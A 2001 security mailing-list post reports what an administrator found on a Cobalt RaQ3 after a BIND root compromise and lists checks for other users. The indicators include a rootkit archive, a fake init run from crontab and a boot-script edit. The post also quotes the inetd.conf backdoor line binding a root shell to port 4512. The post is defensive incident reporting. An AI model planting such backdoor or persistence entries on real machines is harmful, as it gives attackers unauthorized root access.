[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] February Hack update
- Subject: [cobalt-security] February Hack update
- From: Stoopidcoopid@xxxxxxxxx
- Date: Sun, 4 Mar 2001 20:01:22 -0000
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
We have finished checking our RAQ3 following a serious root hack in February
using the Bind exploit. This is what we have found so far by comparing the
hacked machine with a good machine:
1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in "/tmp"
directory. The file had not been executed. A directory called "erkms" was
also created although it was empty.
Advice: run a check for the "erkms.tgz" file and directories.
Also check for
/dev/hdcc
/dev/hdbb
/dev/ptyq
as the presence of these may indicate that the script was at least partly
executed.
2) A file called "init" was put into the /usr/sbin" directory and a process
called "init" was activated every 5 minutes by executing the file from
crontab. Two "init" processes were therefore running at the same time,
purpose of the new process unknown.
Advice: Check for the "init" file, check your crontab entries and check what
processes are running. Look for an "init" process other than that found at
PID1 using "ps -ax".
3) Changes were made to "/etc/rc.d/rc.sysinit" to add the text
"/usr/sbin/cronlogd" at the end which launches a process
called "cronlogd", purpose unknown.
Advice: Check the "/etc/rc.d/rc.sysinit" file has not been tampered with and
what processes are running using "ps -ax".
4) Changes were made to the file "inetd.conf" and also to the file
"inetd.conf.noqpopper", both found in the "/etc" directory. A new line
reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files
which opens port 4512.
Advice: check what ports you have open using
netstat -ap | grep "*:*"
Check both of the above files have not been tampered with.
5) We have a suspect small text file called "la.pid" in both "root" dir and
"/usr/sbin" dir. Web security pages suggest this could be an indicator of
whether malicious code has been properly installed or not. It is not found
on a good machine.
Advice: Try a "locate la.pid" from the command line. Any advice or updates
on this file or the other malicious files or processes is welcome.
SC